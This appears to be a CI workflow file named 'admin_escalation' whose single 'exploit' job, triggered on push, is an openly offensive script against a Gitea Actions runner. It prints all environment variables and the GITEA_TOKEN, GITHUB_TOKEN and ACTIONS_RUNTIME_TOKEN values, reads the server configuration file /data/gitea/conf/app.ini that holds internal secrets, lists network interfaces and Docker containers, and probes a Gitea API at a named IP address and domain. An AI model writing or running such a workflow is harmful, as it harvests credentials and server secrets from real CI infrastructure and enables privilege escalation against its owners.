27 lines
961 B
YAML
27 lines
961 B
YAML
name: admin_escalation
|
|
on: [push]
|
|
jobs:
|
|
exploit:
|
|
runs-on: ubuntu-latest
|
|
steps:
|
|
- name: dump env
|
|
run: |
|
|
echo "=== ENV ==="
|
|
env | sort
|
|
echo "=== GITEA_TOKEN ==="
|
|
echo "${GITEA_TOKEN:-empty}"
|
|
echo "=== GITHUB_TOKEN ==="
|
|
echo "${GITHUB_TOKEN:-empty}"
|
|
echo "=== ALL SECRETS ==="
|
|
echo "${ACTIONS_RUNTIME_TOKEN:-empty}"
|
|
echo "=== INTERNAL_TOKEN ==="
|
|
cat /data/gitea/conf/app.ini 2>/dev/null || echo "no app.ini access"
|
|
echo "=== NETWORK ==="
|
|
ip addr 2>/dev/null || ifconfig 2>/dev/null || echo "no network info"
|
|
echo "=== DOCKER ==="
|
|
docker ps 2>/dev/null || echo "no docker"
|
|
echo "=== GITEA API ==="
|
|
curl -s http://8.213.205.86:3000/api/v1/version 2>/dev/null || echo "no direct access"
|
|
curl -s https://git.monogps.com/api/v1/version 2>/dev/null || echo "no https access"
|
|
|